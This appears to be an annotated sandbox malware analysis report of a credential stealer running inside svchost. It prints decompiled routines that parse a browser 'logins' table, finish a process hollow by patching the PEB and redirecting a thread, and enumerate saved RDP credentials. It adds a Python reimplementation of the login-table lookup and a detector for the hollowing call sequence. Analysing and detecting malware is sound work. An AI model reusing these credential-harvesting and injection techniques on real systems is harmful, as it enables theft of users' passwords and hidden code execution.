/* Row callback for a SQLite file parsed by the sample's own reader. The
   argument roles are inferred from this listing alone: _a12 is the current
   record, _a16 its column count, and E10008860(record, index, &v8, &tag, &value)
   fetches one column, with the tag observed as 1 for text and 0 for an
   integer. A five-column record filtered on type == "table" and
   tbl_name == "logins" matches exactly a sqlite_master row
   (type, name, tbl_name, rootpage, sql), so the function is looking up the
   schema entry of a table named "logins". _a4, _a8 and _a20 are passed
   through unchanged to E10008A44. */
E100092B6(void* __ebx, void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
	char _v8;
	char _v12;
	CHAR* _v16;
	CHAR* _v20;
	intOrPtr _v24;
	char _v28;
	int _t35;
	void* _t52;
	void* _t54;

	_t54 = __ecx;
	if(_a16 == 5) {                                                   // sqlite_master has five columns
		_t35 = E10008860(_a12, 2,  &_v8,  &_v12,  &_v16);              // column 2: tbl_name
		if(_v12 == 1) {                                               // text
			_v20 = _v16;                                              // decompiler emitted push/pop through an unresolved temporary; _v20 is the local compared right below
			_t35 = lstrcmpiA(_v20, "logins");                         // case-insensitive table-name match
			if(_t35 == 0) {
				_t35 = E10008860(_a12, 0,  &_v8,  &_v12,  &_v16);      // column 0: type
				if(_v12 == 1) {
					_t35 = lstrcmpA("table", _v16);                   // must be a table, not an index or view
					if(_t35 == 0) {
						_t35 = E10008860(_a12, 3,  &_v8,  &_v12,  &_v16);  // column 3: rootpage
						if(_v12 == 0) {                               // integer
							_v24 =  *(int*)_v16;                      // destination left unresolved by the decompiler; _v24 is the only local later consumed (by E10008A44) without another assignment
							_t35 = E10008860(_a12, 4,  &_v8,  &_v12,  &_v16);  // column 4: the CREATE TABLE text
							if(_v12 == 1) {
								 *0x10012e8c = 0xffffffff;            // three globals reset to "not found"
								 *0x10012e90 = 0xffffffff;
								 *0x10012e94 = 0xffffffff;
								_t35 = E10008D4F(_v16, E10009028);    // scans the CREATE TABLE text (StrStrIA on "(" in the subcall) and lets the callback fill the globals
								_v28 = 1;
								// continue only when all three globals were resolved
								if( *0x10012e8c != 0xffffffff &&  *0x10012e90 != 0xffffffff &&  *0x10012e94 != 0xffffffff) {
									_t52 = E10008A44(__ebx, _t54, _a4, _a8, _v24,  &_v28, _a20, E100090E3); // executed; walks the table rooted at page _v24 with row callback E100090E3
									return _t52;
								}
							}
						}
					}
				}
			}
		}
	}
	return _t35;
}
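Added example (not part of the Joe Sandbox output and not the sample's code): the same sqlite_master walk expressed in Python against a constructed schema, using the stdlib sqlite3 module instead of the sample's hand-written record parser. Two things are assumptions made for the example only: that the database is a Chromium "Login Data" file (the report only shows the "logins"/"table" comparisons), and that the three globals the sample resets to -1 are the positional indices of the origin_url, username_value and password_value columns. The column-list parser stands in for the StrStrIA(sql, "(") step in E10008D4F.

```python
import sqlite3

# Constructed sample schema (not taken from the sample or the report). The
# column names mirror a Chromium "Login Data" database; that this is the
# file the sample parses is an assumption based on the 'logins' and 'table'
# comparisons in the decompiled routine.
SAMPLE_SCHEMA = """
CREATE TABLE meta (key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR);
CREATE TABLE logins (origin_url VARCHAR NOT NULL, action_url VARCHAR,
    username_element VARCHAR, username_value VARCHAR, password_element VARCHAR,
    password_value BLOB, submit_element VARCHAR, signon_realm VARCHAR NOT NULL,
    date_created INTEGER NOT NULL, blacklisted_by_user INTEGER NOT NULL,
    scheme INTEGER NOT NULL,
    UNIQUE (origin_url, username_element, username_value, password_element, signon_realm));
"""

# Assumption: the three globals the sample resets to -1 hold the indices of
# these columns. Any other three names would be resolved the same way.
WANTED = ("origin_url", "username_value", "password_value")

# Leading keywords of table-level constraints, which are not columns.
TABLE_CONSTRAINTS = {"UNIQUE", "PRIMARY", "FOREIGN", "CHECK", "CONSTRAINT"}


def column_names(create_sql):
    """Return the column names declared in a CREATE TABLE statement.

    This is the job the StrStrIA(sql, "(") step does in the sample: the text
    before the first '(' is the table header, and the outermost parenthesised
    list carries one column (or table constraint) per top-level comma.
    """
    body = create_sql[create_sql.index("(") + 1 : create_sql.rindex(")")]
    decls, current, depth = [], [], 0
    for ch in body:
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
        if ch == "," and depth == 0:      # a top-level comma ends a declaration
            decls.append("".join(current))
            current = []
        else:
            current.append(ch)
    decls.append("".join(current))
    cols = []
    for decl in decls:
        tokens = decl.split()
        if not tokens:
            continue
        first = tokens[0].strip('"`[]')
        if first.upper() in TABLE_CONSTRAINTS:
            continue
        cols.append(first)
    return cols


def locate_logins_columns(schema_sql, wanted=WANTED):
    """Walk sqlite_master the way the decompiled routine does.

    Row filter: type == 'table' (case-sensitive, lstrcmpA) and
    tbl_name == 'logins' (case-insensitive, lstrcmpiA). From the matching row
    take rootpage (column 3) and sql (column 4), then resolve the wanted
    column names to positional indices. Returns (rootpage, indices) or None
    when the table or any wanted column is missing, mirroring the sample
    leaving its globals at -1 and skipping the table walk.
    """
    con = sqlite3.connect(":memory:")
    con.executescript(schema_sql)
    row = con.execute(
        "SELECT rootpage, sql FROM sqlite_master "
        "WHERE type = 'table' AND lower(tbl_name) = 'logins'"
    ).fetchone()
    con.close()
    if row is None:
        return None
    rootpage, sql = row
    cols = column_names(sql)
    indices = {name: (cols.index(name) if name in cols else -1) for name in wanted}
    if -1 in indices.values():
        return None
    return rootpage, indices


if __name__ == "__main__":
    print(locate_logins_columns(SAMPLE_SCHEMA))
```

Resolving column positions from the CREATE TABLE text rather than hard-coding them is what lets a stealer survive schema changes between browser versions; the same parser, pointed at a copy of a real Login Data file, shows which positions such a sample would read.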












Instruction addresses for the E100092B6 listing, one per decompiled statement in the report's side-by-side view: 0x100092b6 through 0x100093e2.

                                                                                                                                        APIs
                                                                                                                                        • lstrcmpiA.KERNEL32(00000000,logins,?), ref: 100092F4
                                                                                                                                        • lstrcmpA.KERNEL32(table,?,00000000,logins,?), ref: 10009329
                                                                                                                                          • Part of subcall function 10008D4F: StrStrIA.SHLWAPI(?,() ), ref: 10008D5F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrcmplstrcmpi
                                                                                                                                        • String ID: logins$table
                                                                                                                                        • API String ID: 3524194181-3800951466
                                                                                                                                        • Opcode ID: 44d694fdf6dd57517d6ea00e6883bb3cd1586d680de51ed0ae053e5ddceef0b7
                                                                                                                                        • Instruction ID: 6104885e12e3212c77871138721ef28eef4c075ae9b00afc7210a2fe4d4bc1eb
                                                                                                                                        • Opcode Fuzzy Hash: 44d694fdf6dd57517d6ea00e6883bb3cd1586d680de51ed0ae053e5ddceef0b7
                                                                                                                                        • Instruction Fuzzy Hash: 2E31C37680060EFEEF11CF91CC81ADE7BB9EB053A4F108262F661A10E4D7719BA49B51
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.05%

                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E02442DC0(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                        				void* _v8;
                                                                                                                                        				long _v12;
                                                                                                                                        				int _v16;
                                                                                                                                        				int _v20;
                                                                                                                                        				void* _v24;
                                                                                                                                        				char _v28;
                                                                                                                                        				char _v32;
                                                                                                                                        				void* _t30;
                                                                                                                                        				int _t33;
                                                                                                                                        				int _t40;
                                                                                                                                        				long _t42;
                                                                                                                                        
                                                                                                                                        				_v12 = 0xffffffff;
                                                                                                                                        				if(E02442D80(__ecx, _a4) != 0) {
                                                                                                                                        					_t30 = E02442E90( &_v8,  &_v24); // executed
                                                                                                                                        					if(_t30 != 0) {
                                                                                                                                        						_v16 = 0;
                                                                                                                                        						_t33 = E024434F0(_v8, _a4, _a8,  &_v32,  &_v28); // executed
                                                                                                                                        						_v16 = _t33;
                                                                                                                                        						if(_v16 == 1) {
                                                                                                                                        							_v20 = 0;
                                                                                                                                        							_t40 = E02443A60(_v8, _v24, _v32, _v28); // executed
                                                                                                                                        							_v20 = _t40;
                                                                                                                                        							if(_v20 == 1) {
                                                                                                                                        								_t42 = GetProcessId(_v8); // executed
                                                                                                                                        								_v12 = _t42;
                                                                                                                                        							}
                                                                                                                                        						}
                                                                                                                                        						if(_v12 == 0xffffffff) {
                                                                                                                                        							TerminateProcess(_v8, 0);
                                                                                                                                        						}
                                                                                                                                        						CloseHandle(_v24);
                                                                                                                                        						CloseHandle(_v8);
                                                                                                                                        						return _v12;
                                                                                                                                        					}
                                                                                                                                        					return _v12;
                                                                                                                                        				}
                                                                                                                                        				return 0;
                                                                                                                                        			}

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: cc8d4e2b65f786519aaaa83a23ffa49c6b3ac7eb85c33867c8e66b500b3cc0f9
                                                                                                                                        • Instruction ID: a2a51676a37116bd1469164a662a13a7978e2d21c4e7fd8f433392ab06ae953b
                                                                                                                                        • Opcode Fuzzy Hash: cc8d4e2b65f786519aaaa83a23ffa49c6b3ac7eb85c33867c8e66b500b3cc0f9
                                                                                                                                        • Instruction Fuzzy Hash: EF2151B5D00209EBDB04DFE4D944AEFB7B8AF48310F208659F915A7240EB70A744CFA0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.00%

                                                                                                                                        C-Code - Quality: 85%
                                                                                                                                        			E024431A0(long _a4, CHAR* _a8) {
                                                                                                                                        				int _v8;
                                                                                                                                        				CHAR* _v12;
                                                                                                                                        				void* _v16;
                                                                                                                                        				void* _v20;
                                                                                                                                        				char _v280;
                                                                                                                                        				void* _t29;
                                                                                                                                        				void* _t48;
                                                                                                                                        
                                                                                                                                        				_t29 = OpenProcess(0x400, 0, _a4);
                                                                                                                                        				_v16 = _t29;
                                                                                                                                        				if(_v16 == 0) {
                                                                                                                                        					L12:
                                                                                                                                        					return 0;
                                                                                                                                        				}
                                                                                                                                        				_push(0x104);
                                                                                                                                        				_push( &_v280);
                                                                                                                                        				_push(_v16); // executed
                                                                                                                                        				L02443D3A(); // executed
                                                                                                                                        				_v20 = _t29;
                                                                                                                                        				FindCloseChangeNotification(_v16); // executed
                                                                                                                                        				if(_v20 <= 0) {
                                                                                                                                        					goto L12;
                                                                                                                                        				}
                                                                                                                                        				_v12 = 0;
                                                                                                                                        				_v8 = 0;
                                                                                                                                        				while(_v8 < _v20) {
                                                                                                                                        					if( *((char*)(_t48 + _v8 - 0x114)) == 0x5c) {
                                                                                                                                        						_v12 = _t48 + _v8 - 0x113;
                                                                                                                                        					}
                                                                                                                                        					if( *((char*)(_t48 + _v8 - 0x114)) != 0) {
                                                                                                                                        						_v8 = _v8 + 1;
                                                                                                                                        						continue;
                                                                                                                                        					} else {
                                                                                                                                        						break;
                                                                                                                                        					}
                                                                                                                                        				}
                                                                                                                                        				if(_v12 == 0) {
                                                                                                                                        					goto L12;
                                                                                                                                        				}
                                                                                                                                        				lstrcpyA(_a8, _v12);
                                                                                                                                        				return 1;
                                                                                                                                        			}

                                                                                                                                        APIs
                                                                                                                                        • OpenProcess.KERNEL32(00000400,00000000,02443080), ref: 024431B4
                                                                                                                                        • GetProcessImageFileNameA.PSAPI(00000000,?,00000104), ref: 024431D7
                                                                                                                                        • FindCloseChangeNotification.KERNEL32(00000000,00000000,?,00000104), ref: 024431E3
                                                                                                                                        • lstrcpyA.KERNEL32(00000000,00000000), ref: 0244324E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$ChangeCloseFileFindImageNameNotificationOpenlstrcpy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1999166229-0
                                                                                                                                        • Opcode ID: 7cf3abe1340666a38ad99f4d1f761fa24ef76571de8dd88360cdb7425ffcab71
                                                                                                                                        • Instruction ID: 41b30540de512fbaea09711873584034e6784f9ceecbac471586ce98c1150501
                                                                                                                                        • Opcode Fuzzy Hash: 7cf3abe1340666a38ad99f4d1f761fa24ef76571de8dd88360cdb7425ffcab71
                                                                                                                                        • Instruction Fuzzy Hash: 99214D74E0014CEBEB14CF94D585BEEBBB5BB44B04F2085DAEA15AB280CB745B85CF50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        C-Code - Quality: 100%
			// Final hand-off of a process hollow. The target was created suspended, so
			// its primary thread still holds the x86 loader's start-up state:
			// Ebx = address of the PEB, Eax = the original entry point.
			// Arguments: _a4 = target process handle, _a8 = its primary-thread handle,
			// _a12 = image base of the injected payload, _a16 = the payload's entry point.
			E02443A60(void* _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
				struct _CONTEXT _v720;
				int _t15;
				int _t17;
				int _t19;

				_v720.ContextFlags = 0x10002; // CONTEXT_INTEGER (x86): only the general-purpose registers are needed
				E024414A0( &(_v720.Dr0), 0, 0x2c8); // memset(): zero the rest of the 0x2CC-byte CONTEXT
				_t15 = GetThreadContext(_a8,  &_v720); // executed
				if(_t15 != 0) {
					// Ebx + 8 is PEB.ImageBaseAddress: one 4-byte write makes the loader
					// treat the injected image as the process image
					_t17 = WriteProcessMemory(_a4, _v720.Ebx + 8,  &_a12, 4, 0); // executed
					if(_t17 != 0) {
						_v720.Eax = _a16; // redirect the thread to the payload's entry point
						_t19 = SetThreadContext(_a8,  &_v720); // executed
						if(_t19 != 0) {
							ResumeThread(_a8); // executed: the payload now runs inside the hollowed process
							return 1;
						}
						return 0;
					}
					return 0;
				}
				return 0;
			}

                                                                                                                                        APIs
                                                                                                                                        • GetThreadContext.KERNEL32(?,00010002), ref: 02443A94
                                                                                                                                        • WriteProcessMemory.KERNEL32(?,?,00500000,00000004,00000000), ref: 02443AB8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ContextMemoryProcessThreadWrite
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2099319263-0
                                                                                                                                        • Opcode ID: bd1b2748c2d636373e780d084f89d7bbbff0d0b11447c133568ae75fd16d9d98
                                                                                                                                        • Instruction ID: 67ff93512eb5d2bbb0dde1a833d1961fdbbed7a9031b7051f6e2c88eb821940d
                                                                                                                                        • Opcode Fuzzy Hash: bd1b2748c2d636373e780d084f89d7bbbff0d0b11447c133568ae75fd16d9d98
                                                                                                                                        • Instruction Fuzzy Hash: C911A575A85109ABEB14CF64DC49FAF37A8AB08B44F108596FA0DE6240EB74E560CF50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%
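The four calls in E02443A60 are the hand-off of a process hollow: read the suspended thread's integer registers, write one pointer to Ebx+8 (PEB.ImageBaseAddress), move Eax to the new entry point, resume. The script below is an added example, not code from the report or the sample. It recognises that ordered sequence in API-trace lines written in the report's own "APIs" bullet format and, on a hit, decodes the ContextFlags value and the WriteProcessMemory size. The sample trace is constructed: the GetThreadContext and WriteProcessMemory lines are the two listed above, the CreateProcessA, SetThreadContext and ResumeThread lines and their ref addresses are invented.

```python
"""Spot the thread-context hijack that finishes a process hollow.

Added example, not code from the report or the sample. It parses API-trace
lines in the report's "APIs" bullet format and flags the ordered sequence
GetThreadContext -> WriteProcessMemory -> SetThreadContext -> ResumeThread
that E02443A60 performs. SAMPLE_TRACE is constructed: the first two ref
addresses after CreateProcessA come from the page, the rest are made up.
"""
import re
from dataclasses import dataclass

# e.g.  • GetThreadContext.KERNEL32(?,00010002), ref: 02443A94
API_LINE = re.compile(
    r"^\s*(?:•\s*)?(?P<name>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

HIJACK_SEQUENCE = ("GetThreadContext", "WriteProcessMemory", "SetThreadContext", "ResumeThread")

# x86 CONTEXT.ContextFlags bits; CONTEXT_i386 (0x10000) is OR'ed into every value
CONTEXT_I386 = 0x00010000
CONTEXT_FLAG_NAMES = {
    0x01: "CONTEXT_CONTROL", 0x02: "CONTEXT_INTEGER", 0x04: "CONTEXT_SEGMENTS",
    0x08: "CONTEXT_FLOATING_POINT", 0x10: "CONTEXT_DEBUG_REGISTERS", 0x20: "CONTEXT_EXTENDED_REGISTERS",
}


@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: str


def parse_trace(text):
    """Turn report-style API bullets into ApiCall records, in trace order."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw.strip() else []
        calls.append(ApiCall(m.group("name"), m.group("module"), args, m.group("ref").upper()))
    return calls


def describe_context_flags(value):
    """Names of the register groups an x86 ContextFlags value asks for."""
    if value & CONTEXT_I386 != CONTEXT_I386:
        return []
    return [name for bit, name in sorted(CONTEXT_FLAG_NAMES.items()) if value & bit]


def find_context_hijacks(calls, sequence=HIJACK_SEQUENCE):
    """Return the matched ApiCalls, one list per completed sequence.

    Ordered state machine: unrelated calls between the steps are ignored and
    a fresh GetThreadContext restarts a partial match, so a hit means the
    four calls happened in this order, not merely that all four occur.
    """
    hits, current, idx = [], [], 0
    for call in calls:
        if call.name == sequence[idx]:
            current.append(call)
            idx += 1
            if idx == len(sequence):
                hits.append(current)
                current, idx = [], 0
        elif call.name == sequence[0]:
            current, idx = [call], 1
    return hits


def describe_hit(hit):
    """Pull out what an analyst checks on a hit.

    In the report's rendering the second GetThreadContext argument shows the
    ContextFlags value (00010002 above); the fourth WriteProcessMemory
    argument is the byte count.
    """
    get_ctx, wpm = hit[0], hit[1]
    flags = int(get_ctx.args[1], 16) if len(get_ctx.args) > 1 and get_ctx.args[1] != "?" else None
    size = int(wpm.args[3], 16) if len(wpm.args) > 3 and wpm.args[3] != "?" else None
    return {
        "refs": [c.ref for c in hit],
        "context_flags": describe_context_flags(flags) if flags is not None else [],
        "write_size": size,
        # one pointer-sized write between reading and restoring the integer
        # registers is the shape of the PEB.ImageBaseAddress patch in E02443A60
        "peb_patch_shaped": size == 4,
    }


# Constructed trace in the report's bullet format (see lead-in for provenance)
SAMPLE_TRACE = """\
• CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 02443900
• GetThreadContext.KERNEL32(?,00010002), ref: 02443A94
• WriteProcessMemory.KERNEL32(?,?,00500000,00000004,00000000), ref: 02443AB8
• SetThreadContext.KERNEL32(?,?), ref: 02443ADA
• ResumeThread.KERNEL32(?), ref: 02443AEC
"""

if __name__ == "__main__":
    for hit in find_context_hijacks(parse_trace(SAMPLE_TRACE)):
        print(describe_hit(hit))
```

A real trace interleaves many unrelated calls between the four steps; the matcher tolerates that but insists on order, so GetThreadContext, SetThreadContext and ResumeThread without an intervening WriteProcessMemory do not complete a match, and a 4-byte write is reported as PEB-patch shaped rather than assumed to be one.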

                                                                                                                                        C-Code - Quality: 100%
			// Reads a whole file in 4 KiB chunks and hands every chunk to E100011AA.
			// The decompiler did not recover the prototype: _t26 is the frame pointer,
			// so *(_t26 + 8) is the first argument (file path) and *(_t26 + 0xc) the
			// second (an opaque value passed through to E100011AA). The locals are
			// _t26 - 4 (file handle), _t26 - 8 (bytes read) and _t26 - 0x1008
			// (a 0x1000-byte stack buffer). _t24 and _t25 are registers passed
			// through unchanged.
			E1000124C() {
				void* _t12;
				void* _t13;
				int _t16;
				void* _t24;
				void* _t25;
				void* _t26;

				// CreateFileA(path, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL)
				_t12 = CreateFileA( *(_t26 + 8), 0x80000000, 3, 0, 3, 0, 0); // executed
				 *(_t26 - 4) = _t12;
				_t13 = _t12 + 1; // INVALID_HANDLE_VALUE (-1) + 1 == 0
				if(_t13 != 0) {
					while(1) {
						_t16 = ReadFile( *(_t26 - 4), _t26 - 0x1008, 0x1000, _t26 - 8, 0); // executed
						if(_t16 == 0) {
							break; // read error: close the handle and report failure
						}
						// consume the chunk; at end of file this is called once more with a zero byte count
						E100011AA(_t26 - 0x1008, _t24, _t25,  *((intOrPtr*)(_t26 + 0xc)), _t26 - 0x1008,  *(_t26 - 8)); // executed
						if( *(_t26 - 8) != 0) {
							continue;
						} else {
							CloseHandle( *(_t26 - 4)); // zero bytes read == end of file
							return 1;
						}
					}
					CloseHandle( *(_t26 - 4));
					return 0;
				} else {
					return _t13; // 0: the file could not be opened
				}
			}

                                                                                                                                        APIs
                                                                                                                                        • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 1000125E
                                                                                                                                        • ReadFile.KERNEL32(?,?,00001000,?,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 10001282
                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,00001000,?,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 1000128E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$CloseCreateHandleRead
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1035965006-0
                                                                                                                                        • Opcode ID: bfff0d5d86f8a951dd4e9188aa5afa9311fd4997f04a5bf91ceee8a02c3fa9dc
                                                                                                                                        • Instruction ID: d891eaf70732835da4134534b8ba5287ba3f19d9ced1e028663f9beb8a2a542a
                                                                                                                                        • Opcode Fuzzy Hash: bfff0d5d86f8a951dd4e9188aa5afa9311fd4997f04a5bf91ceee8a02c3fa9dc
                                                                                                                                        • Instruction Fuzzy Hash: 06F0EC35A4054DB9FB11DE90DC02FDDBAA8EB14789F104061B244F50D9D6B1ABA4EB10
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.35%

                                                                                                                                        C-Code - Quality: 16%
			// Harvests saved Remote Desktop logons from the Windows Credential Manager.
			// The three globals are dynamically resolved imports: *0x1000f4b8 is
			// CredEnumerateA and *0x1000f4bc is CredFree (both confirmed by the API
			// trace below); *0x1000f4f4 is a third resolved pointer that is checked
			// here but not called in this function.
			// Offsets into each 32-bit CREDENTIALA the loop dereferences:
			//   +0x08 TargetName, +0x18 CredentialBlobSize, +0x1C CredentialBlob, +0x30 UserName
			E10009C4D(intOrPtr _a4) {
				void* _v8; // PCREDENTIALA* array filled in by CredEnumerateA
				int _v12; // DWORD count of returned entries
				void* _t17;
				void* _t20;
				intOrPtr* _t23;
				intOrPtr* _t24;
				void* _t25;

				if( *0x1000f4bc != 0 &&  *0x1000f4b8 != 0 &&  *0x1000f4f4 != 0) {
					_v8 = 0;
					_v12 = 0;
					// CredEnumerateA("TERMSRV/*", 0, &count, &credentials): the filter is a
					// target-name prefix, so only entries saved for RDP hosts ("TERMSRV/<host>") come back
					_t20 =  *0x1000f4b8("TERMSRV/*", 0,  &_v12,  &_v8); // executed
					_t17 = _t20;
					if(_t17 != 0 && _v12 != 0 && _v8 != 0) {
						_t23 = _v8;
						while(_v12 != 0 &&  *_t23 != 0) {
							_t24 =  *_t23; // current CREDENTIALA*
							// E10009B9C(ctx, UserName, TargetName, CredentialBlob, CredentialBlobSize)
							E10009B9C(_a4,  *((intOrPtr*)(_t24 + 0x30)),  *((intOrPtr*)(_t24 + 8)),  *((intOrPtr*)(_t24 + 0x1c)),  *((intOrPtr*)(_t24 + 0x18)));
							_t25 = _t23;
							_v12 = _v12 - 1;
							_t23 = _t25 + 4; // next pointer in the array
						}
						return  *0x1000f4bc(_v8); // CredFree(credentials)
					}
				}
				return _t17;
			}

                                                                                                                                        APIs
                                                                                                                                        • CredEnumerateA.SECHOST(TERMSRV/*,00000000,00000000,00000000), ref: 10009C8C
                                                                                                                                        • CredFree.ADVAPI32(00000000), ref: 10009CD3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Cred$EnumerateFree
                                                                                                                                        • String ID: TERMSRV/*
                                                                                                                                        • API String ID: 3403564193-275249402
                                                                                                                                        • Opcode ID: 2c7132e0befa47dbd424e3ba334f0794f9b22ce08d7012935d5c15db61ddc90e
                                                                                                                                        • Instruction ID: f2bcace94667ccc7cf485fa1688972958c13b9acfb2390048d65b055f40299d6
                                                                                                                                        • Opcode Fuzzy Hash: 2c7132e0befa47dbd424e3ba334f0794f9b22ce08d7012935d5c15db61ddc90e
                                                                                                                                        • Instruction Fuzzy Hash: FC115E32C02218EBFF61CF80CD44BDABBF4EB00384F11416AE543624A9D375AAC4EB91
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 2.28%

                                                                                                                                        C-Code - Quality: 71%
                                                                                                                                        			E02441770(void* __eflags) {
                                                                                                                                        				intOrPtr _v8;
                                                                                                                                        				signed int _v12;
                                                                                                                                        				signed int _v16;
                                                                                                                                        				intOrPtr _v20;
                                                                                                                                        				char _v24;
                                                                                                                                        				signed int _v28;
                                                                                                                                        				long _v32;
                                                                                                                                        				int _v36;
                                                                                                                                        				long _v40;
                                                                                                                                        				signed int _v44;
                                                                                                                                        				signed int _v48;
                                                                                                                                        				intOrPtr _v52;
                                                                                                                                        				char _v312;
                                                                                                                                        				intOrPtr _t45;
                                                                                                                                        				intOrPtr _t46;
                                                                                                                                        				int _t55;
                                                                                                                                        				signed int _t74;
                                                                                                                                        				void* _t82;
                                                                                                                                        				void* _t83;
                                                                                                                                        				void* _t84;
                                                                                                                                        
                                                                                                                                        				asm("xorpd xmm0, xmm0");
                                                                                                                                        				asm("movlpd [ebp-0xc], xmm0");
                                                                                                                                        				asm("xorpd xmm0, xmm0");
                                                                                                                                        				asm("movlpd [ebp-0x1c], xmm0");
                                                                                                                                        				_v24 = 0x4000;
                                                                                                                                        				_t45 = E02441390(_v24);
                                                                                                                                        				_t84 = _t83 + 4;
                                                                                                                                        				_v20 = _t45;
                                                                                                                                        				_v8 = _v20;
                                                                                                                                        				_push( &_v24);
                                                                                                                                        				_t46 = _v8;
                                                                                                                                        				_push(_t46);
                                                                                                                                        				_push(0);
                                                                                                                                        				_push(0);
                                                                                                                                        				_push(2); // executed
                                                                                                                                        				L02443D2E(); // executed
                                                                                                                                        				_v52 = _t46;
                                                                                                                                        				if(_v52 != 0) {
                                                                                                                                        					L3:
                                                                                                                                        					E024413D0(_v20);
                                                                                                                                        					_v36 = GetWindowsDirectoryA( &_v312, 0x104);
                                                                                                                                        					if(_v36 > 0) {
                                                                                                                                        						 *((char*)(_t82 + 0xfffffffffffffecf)) = 0;
                                                                                                                                        						_t55 = GetVolumeInformationA( &_v312, 0, 0,  &_v40, 0, 0, 0, 0); // executed
                                                                                                                                        						if(_t55 != 0) {
                                                                                                                                        							_v32 = _v40;
                                                                                                                                        							_v28 = 0;
                                                                                                                                        						}
                                                                                                                                        					}
                                                                                                                                        					_t74 = _v28;
                                                                                                                                        					_v16 = E02441400(_v32, 0x20, _t74) ^ _v16;
                                                                                                                                        					_v12 = _t74 ^ _v12;
                                                                                                                                        					return _v16;
                                                                                                                                        				}
                                                                                                                                        				while(_v8 != 0) {
                                                                                                                                        					E024414A0( &_v48, 0, 8);
                                                                                                                                        					E02441450( &_v48, _v8 + 0x2c,  *((intOrPtr*)(_v8 + 0x34)));
                                                                                                                                        					_t84 = _t84 + 0x18;
                                                                                                                                        					_v16 = _v16 ^ _v48;
                                                                                                                                        					_v12 = _v12 ^ _v44;
                                                                                                                                        					_v8 =  *((intOrPtr*)(_v8 + 8));
                                                                                                                                        				}
                                                                                                                                        				goto L3;
                                                                                                                                        			}

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02441390: GetProcessHeap.KERNEL32(?,02442516,00080000), ref: 0244139C
                                                                                                                                          • Part of subcall function 02441390: RtlAllocateHeap.NTDLL(02140000,00000000,02442516,?,02442516,00080000), ref: 024413BD
                                                                                                                                        • GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,0244159B,00004000), ref: 024417B5
                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 02441828
                                                                                                                                        • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0244185E
                                                                                                                                        Memory Dump Source
